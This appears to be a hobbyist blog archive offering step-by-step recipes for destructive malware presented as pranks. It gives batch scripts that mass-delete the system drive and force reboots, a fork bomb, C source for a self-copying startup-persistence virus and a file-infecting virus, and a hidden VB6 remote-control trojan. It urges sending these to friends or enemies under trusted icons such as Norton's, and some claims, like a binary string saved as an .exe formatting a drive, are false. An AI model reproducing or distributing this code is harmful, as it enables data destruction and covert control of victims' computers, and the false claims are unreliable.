Showing posts with label VIRUS PRANK. Show all posts
Showing posts with label VIRUS PRANK. Show all posts

Thursday, 14 June 2012

Trick to make a Virus which can Format and Destroy Hard Drive

There is a Trick to make a Virus which can Format and Destroy Hard Drive using Notepad. This Virus can be used to annoy your friends or enemy. Touse this Trick follow the simple steps given below :
1) Open Notepad.
2) Copy and Paste the given Code into Notepad :




01001011000111110010010101010101010000011111100000

3) Save it as HardDriveVirus.exe.
4) Now it is done.
5) Don't Run this Fle on your Own Computer. If you run this file the Hard Drive would be Formated.
So it is a simple Trick to make a Virus which can Format and Destroy Hard Drive

Tricks to make Simple Virus

There are many Virus which we an develop or can make easily. As I already posted earlier about many Tricks to make Virus, Now here are some more Tricks to make Simple Virus. To make them use the following Trick :
1) Open Notepad
2) Copy and Paste the given below Code of your Choice i.e. type of Virus you want to make :



a) To Delete all the Content of a Drive use this Code :
@echo off
del %systemdrive%\*.* /f /s /q
shutdown -r -f -t 00
b) To Crush the Windows use this Code :
@Echo off
Del C:\ *.* y
c) To make Computer Restart simultaneously use this Code :
@echo off shutdown -r -f -t 00
d) To make Fork Virus to open many Command Prompts use this Code :
start
%0
goto :s
3) Now Save these Files with any desired name with .bat extention.
4) Don't Run these Files on Your own Computer otherwise the Result you already know.
So these are simple Tricks to make Simple Virus.

Friday, 8 June 2012

Trick to make Poison Virus

There is Trick to make a Poison Virus i.e Virus which would definetly lead to destruction in computer.
This trick can be used to annoy Friends or Enemy.

This Virus would ask to choose a number
between 1 - 5 and then do a certain action :




1) Shutdown
2) Restart
3) Wipes out your hard drive (BEWARE).
4) Net send
5) Messages then shutdown

To make this simple virus follow these simple steps :

1) Open Notepad.

2) Copy and Paste the following Code into Notepad :

@echo off
title The end of the world
cd C:\
:menu
cls
echo
I take no responsibility for your actions. Beyond this point it is you that has the power to kill yourself. If you press ‘x’ then your PC will be formatted. Do not come crying to me when you fried your computer or if you lost your project etc…
pause
echo Pick your poison:
echo 1. Die this way (Wimp)
echo 2. Die this way (WIMP!)
echo 3. DO NOT DIE THIS WAY
echo 4. Die this way (you’re boring)
echo 5. Easy way out
set input=nothing
set /p input=Choice:
if %input%==1 goto one
if %input%==2 goto two


3) Save it as PoisonVirus.bat.

4) Now it is done.

So it is a simple Trick to make Poison Virus.

Thursday, 7 June 2012

Trick to make PowerFull Worm Virus.

Worms are Programs that Replicate themselves from System to System without the use of a Host File. Worms generally Exist inside the other Files like Word or Excel Documents. This Trick can be used to annoy Friends or Enemy.
Note : Run this file at your own Risk. I am not Responsible for any Accident caused by this File on your Computer.Here is Trick to make PowerFull Worm Virus.

1) Open Notepad and type "Start Virus Virus.bat".
2) Save it as and Virus.bat.
3) Now create shortcut to this File so it looks more Serious.
4) Now go to Properties and Change Icon.
5) Now Rename it and Send it to anyone.
6) Now it is done.
So it is simple Trick to make PowerFull Worm Virus.

Wednesday, 23 May 2012

Shakunimama Funny virus - Create And Enjoy With Friend

MAKE YOUR KEYBOARD TYPE (ANY) MESSAGE CONTINUOUSLY-VBS TRICK


This VBS trick can make any of your friend's keyboard type any message continuously.

1- Open Notepad, copy the code .






Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "This is a Virus. You have been infected."
loop


2 -  save the file as enjoy.vbs or  *.vbs

 Dont open this File on your computer 


if you open this your computer 
You might need to restart your computer to stop this.

Send this file to your friends as an email attachment to see the fun.

Sunday, 20 May 2012

A Virus Program to Restart the Computer at Every Startup

Today I will show you how to create a virus that restarts the computer upon every start up. That is, upon infection, the computer will get restarted every time the system is booted. This means that the computer will become inoperable since it reboots as soon as the desktop is loaded.
For this, the virus need to be double clicked only once and from then onwards it will carry out rest of the operations. And one more thing, none of the antivirus software detects this as a virus since I have coded this virus in C. So if you are familiar with C language then it’s too easy to understand the logic behind the coding.
Here is the source code.
#include<stdio.h>
#include<dos.h>
#include<dir.h>
int found,drive_no;char buff[128];
void findroot()
{
int done;
struct ffblk ffblk; //File block structure
done=findfirst(“C:\\windows\\system”,&ffblk,FA_DIREC); //to determine the root drive
if(done==0)
{
done=findfirst(“C:\\windows\\system\\sysres.exe”,&ffblk,0); //to determine whether the virus is already installed or not
if(done==0)
{
found=1; //means that the system is already infected
return;
}
drive_no=1;
return;
}
done=findfirst(“D:\\windows\\system”,&ffblk,FA_DIREC);
if(done==0)
{
done=findfirst(“D:\\windows\\system\\sysres.exe”,&ffblk,0);
if
(done==0)
{
found=1;return;
}
drive_no=2;
return;
}
done=findfirst(“E:\\windows\\system”,&ffblk,FA_DIREC);
if(done==0)
{
done=findfirst(“E:\\windows\\system\\sysres.exe”,&ffblk,0);
if(done==0)
{
found=1;
return;
}
drive_no=3;
return;
}
done=findfirst(“F:\\windows\\system”,&ffblk,FA_DIREC);
if(done==0)
{
done=findfirst(“F:\\windows\\system\\sysres.exe”,&ffblk,0);
if(done==0)
{
found=1;
return;
}
drive_no=4;
return;
}
else
exit(0);
}
void main()
{
FILE *self,*target;
findroot();
if(found==0) //if the system is not already infected
{
self=fopen(_argv[0],”rb”); //The virus file open’s itself
switch(drive_no)
{
case 1:
target=fopen(“C:\\windows\\system\\sysres.exe”,”wb”); //to place a copy of itself in a remote place
system(“REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\
CurrentVersion\\Run \/v sres \/t REG_SZ \/d
C:\\windows\\system\\ sysres.exe”); //put this file to registry for starup
break;
case 2:
target=fopen(“D:\\windows\\system\\sysres.exe”,”wb”);
system(“REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\
CurrentVersion\\Run \/v sres \/t REG_SZ \/d
D:\\windows\\system\\sysres.exe”);
break;
case 3:
target=fopen(“E:\\windows\\system\\sysres.exe”,”wb”);
system(“REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\
CurrentVersion\\Run \/v sres \/t REG_SZ \/d
E:\\windows\\system\\sysres.exe”);
break;
case 4:
target=fopen(“F:\\windows\\system\\sysres.exe”,”wb”);
system(“REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\
CurrentVersion\\Run \/v sres \/t REG_SZ \/d
F:\\windows\\system\\sysres.exe”);
break;
default:
exit(0);
}
while(fread(buff,1,1,self)>0)
fwrite(buff,1,1,target);
fcloseall();
}
else
system(“shutdown -r -t 0″); //if the system is already infected then just give a command to restart}
NOTE: COMMENTS ARE GIVEN IN BROWN COLOUR.
 
Compiling The Scource Code Into Executable Virus.
 
1. Download the Source Code Here
2. The downloaded file will be Sysres.C
3. For step-by-step compilation guide, refer my post How to compile C Programs.
 
Testing And Removing The Virus From Your PC
 
You can compile and test this virus on your own PC without any fear. To test, just doubleclick the sysres.exe file and restart the system manually. Now onwards ,when every time the PC is booted and the desktop is loaded, your PC will restart automatically again and again.
It will not do any harm apart from automatically restarting your system. After testing it, you can remove the virus by the following steps.
 
1. Reboot your computer in the SAFE MODE
2. Goto
X:\Windows\System
(X can be C,D,E or F)
3.You will find a file by name sysres.exe, delete it.
4.Type regedit in run.You will goto registry editor.Here navigate to
HKEY_CURRENT_USER\Software\Microsoft\Windows\ CurrentVersion\Run

 There, on the right site you will see an entry by name “sres“.Delete this entry.That’s it.You have removed this Virus successfully.
 
Logic Behind The Working Of The Virus
 
If I don’t explain the logic(Algorithm) behind the working of the virus,this post will be incomplete. So I’ll explain the logic in a simplified manner. Here I’ll not explain the technical details of the program. If you have further doubts please pass comments.
 
LOGIC:
 
1. First the virus will find the Root partition (Partition on which Windows is installed).
2. Next it will determine whether the Virus file is already copied(Already infected) intoX:\Windows\System
3. If not it will just place a copy of itself into X:\Windows\System and makes a registry entry to put this virus file onto the startup.
4. Or else if the virus is already found in the X:\Windows\System directory(folder), then it just gives a command to restart the computer.
This process is repeated every time the PC is restarted.
NOTE: The system will not be restarted as soon as you double click theSysres.exe file.The restarting process will occur from the next boot of the system.
 
AND ONE MORE THING BEFORE YOU LEAVE (This Step is optional)
 
After you compile, the Sysres.exe file that you get will have a default icon. So if you send this file to your friends they may not click on it since it has a default ICON. So it is possible to change the ICON of this Sysres.exe file into any other ICON that is more trusted and looks attractive.
For example you can change the .exe file’s icon into Norton antivirus ICON itself so that the people seeing this file beleives that it is Norton antivirus. Or you can change it’s ICON into the ICON of any popular and trusted programs so that people will definitely click on it.
The detailed tutorial on changing the ICON is given in my post How To Change The ICON Of An EXE File .

Saturday, 19 May 2012

How to Create a Computer Virus?

This program is an example of how to create a virus in C. This program demonstrates a simple virus program which upon execution (Running) creates a copy of itself in the other file. Thus it destroys other files by infecting them. But the virus infected file is also capable of spreading the infection to another file and so on. Here’s the source code of the virus program.

 #include<stdio.h>
#include<io.h>
#include<dos.h>
#include<dir.h>
#include<conio.h>
#include<time.h>
FILE *virus,*host;
int done,a=0;
unsigned long x;
char buff[2048];
struct ffblk ffblk;
clock_t st,end;
void main()
{
st=clock();
clrscr();
done=findfirst(“*.*”,&ffblk,0);
while(!done)
{
virus=fopen(_argv[0],”rb”);
host=fopen(ffblk.ff_name,”rb+”);
if(host==NULL) goto next;
x=89088;
printf(“Infecting %s\n”,ffblk.ff_name,a);
while(x>2048)
{
fread(buff,2048,1,virus);
fwrite(buff,2048,1,host);
x-=2048;
}
fread(buff,x,1,virus);
fwrite(buff,x,1,host);
a++;
next:
{
fcloseall();
done=findnext(&ffblk);
}
}
printf(“DONE! (Total Files Infected= %d)”,a);
end=clock();
printf(“TIME TAKEN=%f SEC\n”,
(end-st)/CLK_TCK);
getch();
}


COMPILING METHOD:

 
USING BORLAND TC++ 3.0 (16-BIT):
1. Load the program in the compiler, press Alt-F9 to compile
2. Press F9 to generate the EXE file (DO NOT PRESS CTRL-F9,THIS WILL INFECT ALL THE FILES IN CUR DIRECTORY INCLUDIN YOUR COMPILER)
3. Note down the size of generated EXE file in bytes (SEE EXE FILE PROPERTIES FOR IT’S SIZE)
4. Change the value of X in the source code with the noted down size (IN THE ABOVE SOURCE CODE x= 89088; CHANGE IT)
5. Once again follow the STEP 1 & STEP 2.Now the generated EXE File is ready to infect
 
USING BORLAND C++ 5.5 (32-BIT) :
1. Compile once,note down the generated EXE file length in bytes
2. Change the value of X in source code to this length in bytes
3. Recompile it.The new EXE file is ready to infect
 

HOW TO TEST:

 
1. Open new empty folder
2. Put some EXE files (BY SEARCHING FOR *.EXE IN SEARCH & PASTING IN THE NEW FOLDER)
3. Run the virus EXE file there you will see all the files in the current directory get infected.
4. All the infected files will be ready to reinfect
That’s it
WARNING: FOR EDUCATIONAL PURPOSES ONLY. DO NOT SPREAD OR MISUSE THIS VIRUS CODE

Whats the difference between a virus, spyware, Malware, and adware?

Now days the average computer user must be aware of the potential threats their computer faces each time they connect to the world wide web. It is a dangerous place for a computer and the security threats are growing everyday. Now we also have to protect our online accounts as well as files on our own computers. I know Avast Internet security now covers your social networking accounts.  It is all so confusing, viruses, spyware, malware, and adware, just to name a few. Why are they all so different?

In the old days we used to call everything a virus, however now days we have more precise names to further categorize them. Below I will show you the difference between a virus, spyware, malware, and adware. It is important to protect your computer from viruses but how can you do that when you do not know what you are dealing with?

What is Malware?

Malware is a software program that has bad intentions. It can either be installed by the computer user accidentally or it can sneak into your computer through various avenues. Its not the same as a piece of software that by chance causes harm to your computer, malware is software that has been developed with the intent of causing problems with your computer.

What is Spyware?

Spyware is a type of malware program that invades your computer and basically spies on you. There are different types of spyware that collect different information. A common spyware type is a keylogger which records keystrokes typed on your keyboard. This is how people lose their bank account details. Other spyware will record your actions and browsing habits on the internet. Any information collected by spyware is usually with the intent to sell.

What is Adware?

Adware is another form of malware and is exactly as the name suggests, software with advertising. Adware can be downloaded and sometimes included in free programs. For example Windows Live messenger and Yahoo messenger contain adware. Although some programs give the option not to install the extra adware, others seem to sneak it in without permission.

What is Virus?

A virus is a small program designed to infect your computer and cause errors, computer crashes, and even destroy your computer hardware. Unlike spyware, a virus can grow and replicate itself. It can also travel from one computer to another via an internet connection. Of course you can get viruses from discs with virus infested files stored on them, however the internet is the most common entry point. Some common symptoms of a virus are emails being sent to all contacts when you didn’t send them, being taken to webpage’s that you didn’t choose, or being told you have a virus and to download a program to fix it.

A Virus Program to Disable USB Ports

Virus to disable USB portsIn this post I will show how to create a simple virus that disables/blocks the USB ports on the computer (PC). As usual I use my favorite C programming language to create this virus. Anyone with a basic knowledge of C language should be able to understand the working of this virus program.
Once this virus is executed it will immediately disable all the USB ports on the computer. As a result the you’ll will not be able to use your pen drive or any other USB peripheral on the computer. The source code for this virus is available for download. You can test this virus on your own computer without any worries since I have also given a program to re-enable all the USB ports.
1. Download the USB_Block.rar file on to your computer.
2. It contains the following 4 files.
  • block_usb.c (source code)
  • unblock_usb.c (source code)
3. You need to compile them before you can run it. A step-by-step procedure to compile C programs is given in my post - How to Compile C Programs.
3. Upon compilation of block_usb.c you get block_usb.exe which is a simple virus that will block (disable) all the USB ports on the computer upon execution (double click).
4. To test this virus, just run the block_usb.exe file and insert a USB pen drive (thumb drive). Now you can see that your pen drive will never get detected. To re-enable the USB ports just run the unblock_usb.exe  (you need to compile unblock_usb.c) file. Now insert the pen drive and it should get detected.
5. You can also change the icon of this file to make it look like a legitimate program. For more details on this refer my post – How to Change the ICON of an EXE file (This step is also optional).
I hope you like this post. Please pass your comments.

Friday, 17 June 2011

Virus Code


Image Hosted by ImageShack.us
A simple VIRUS code is here: Just save the following code as .bat extension in notepad.
The antivirus will detect it as virus. see for yourself.  


It will affect *.com and *.EXE files .

It will multiply itself and may get more dangerous when altered.

@echo off>nul.ViRuSif

“%1==”/ViRuS_MULTIPLY goto ViRuS_multiplyif

“%1==”/ViRuS_OUTER_LOOP goto ViRuS_outer_loopif

“%1==”/ViRuS_FINDSELF goto ViRuS_findselfif

“%VOFF%==”T goto ViRuS_OLDBAT

set ViRuSname=%0

if not exist %0.bat call %0 /ViRuS_FINDSELF %path%

if not exist %ViRuSname%.bat set ViRuSname=

if “%ViRuSname%==” goto ViRuS_OLDBAT

How to write a simple trojan in vb6 | Creating a Virus

How to write a simple trojan in vb6

Writing a Trojan is a lot easier than most people think. All it really involves is two simple applications both with fewer than 100 lines of code.
The first application is the client or the program that one user knows about. The second is the server or the actual “trojan” part. I will now go
through what you need for both and some sample code.

Server

The server is the Trojan part of the program. You usually will want this to be as hidden as possible so the average user can’t find it.
To do this you start by using

Private Sub Form_Load()
Me.Visible = False
End Sub

This little bit of code makes the program invisible to the naked eye. Now we all know that the task manager is a little bit peskier.
So to get our application hidden from that a little better we make our code look like this.

Private Sub Form_Load()
Me.Visible = False
App.TaskVisible = False
End Sub

(Due to Bill gates, all running exe's will be displayed in the list of running processes. Your app will be hidden in the Running Applications List though )

So now, we have a program that is virtually invisible to the average user, and it only took four lines of code. Now all of you are thinking that this
tutorial sucks right about now so lets make it a lot better by adding functions to our Trojan!
The first thing we want to do is make it be able to listen for connections when it loads. So in order to do this we need to add a Winsock Control.
I named my control win but you can name yours what ever.
Now to make it listen on port 2999 when the Trojan starts up we make our code look like this.

Private Sub Form_Load()
Me.Visible = False
App.TaskVisible = False
win.LocalPort = 2999
win.RemotePort = 455
win.Listen
End Sub

This code will set the local open port to 2999 and the port it sends it to is 455. So now, we have a program that listens but still doesn’t do anything neat.

Then we add this code to our main form:

Private Sub win_ConnectionRequest(ByVal requestID As Long)
win.Close
win.Accept requestID
End Sub

Private Sub win_DataArrival(ByVal bytesTotal As Long)
win.GetData GotDat
DoActions (GotDat)
End Sub

We now need to program the DoActions function that we called on our main form. In case you were wondering the code that we added to the form does two different things. The first sub makes it so all connection requests are automatacly accepted. The second sub makes it so all data is automaticly accepted and it then passes all of the data to the function DoActions which we are about to code.

For the DoActions code, we want to make a public function in the module. (Public so it can be used by code outside of the Module) So add this code to the module and we are about done with the server
of the Trojan!

Public Function DoActions(x As String)

Select Case x
Case "msgbox"
Msgbox "The file C:\windows\getboobies.exe has caused an error and will be terminated",vbCritical,"Critical Error"

Case "shutdown"
shell "shutdown -s -f -t 00"
End Select
End Function

Ok now we have a program that when the data “Msgbox” is sent to it on port 2999 it will display a msgbox on the victims computer. When the data "shutdown" is sent to it on port 2999 it will shutdown the computer. I used a Select Case statement so it is easy to modify this code to your own needs later on.

Congradulations! You just made your first Trojan. Lets go over the complete code now.

Main Form

Private Sub Form_Load()
Me.Visible = False
App.TaskVisible = False
win.LocalPort = 2999
win.RemotePort = 455
win.Listen
End Sub

Pivate Sub win_ConnectionRequest(ByVal requestID As Long)
win.Close
win.Accept requestID
End Sub

Private Sub win_DataArrival(ByVal bytesTotal As Long)
win.GetData GotDat
DoActions (GotDat)
End Sub

Remember to add your winsock control and name it to win if you use this code.

Module

Public Function DoActions(x As String)

Select Case x
Case "msgbox"
Msgbox "The file C:\windows\getboobies.exe has caused an error and will be terminated",vbCritical,"Critical Error"

Case "shutdown"
shell "shutdown -s -f -t 00"
End Select
End Function

That’s all there is to the server side or Trojan part of it. Now on to the Client.

Client

The client will be what you will interact with. You will use it to connect to the remote server (trojan) and send it commands. Since we made a server
that accepts the command of “shutdown” and "msgbox" lets make a client that sends the command “shutdown” and "msgbox".

Make a form and add a Winsock Control, a text box, and 4 buttons. The Text box should be named txtIP if you want it to work with this code.
In addition, your buttons should be named cmdConnect, cmdMsgbox, cmdShutdown, and cmdDisconnect. Now lets look at the code we would use to make our
Client.

Private Sub cmdConnect_Click()
IpAddy = txtIp.Text
Win.Close
Win.RemotePort = 2999
Win.RemoteHost = IpAddy
Win.LocalPort = 9999
Win.Connect
cmdConnect.Enabled = False
End Sub

Private Sub cmdDisconnect_Click()
Win.Close
cmdConnect.Enabled = True
End Sub

Private Sub cmdMsgbox_Click()
Win.SendData "msgbox"
End Sub

Private Sub cmdShutdown_Click()
Win.SendData "shutdown"
End Sub

That is the code for the client. All it does is gets the Ip Adress from txtIp and connects to it on remote port 2999. Then when connected you can send
the “shutdown” or "msgbox" data to the server and the respective actions will be carried out (shutdown computer or display a msgbox)

These two programs do very little but can quickly evolve into a powerful remote administration tool if you know what you are doing. I suggest trying
to add different types of error handling and functions to both the server and client.

Ideas:

Make the server able to download a file specified by the attacker

Add code to make the Server be executed at startup. (Its a registry key)

Add a keylogger to the server - make it send the log to the attacker. There are loads more things you could do, just use your imagination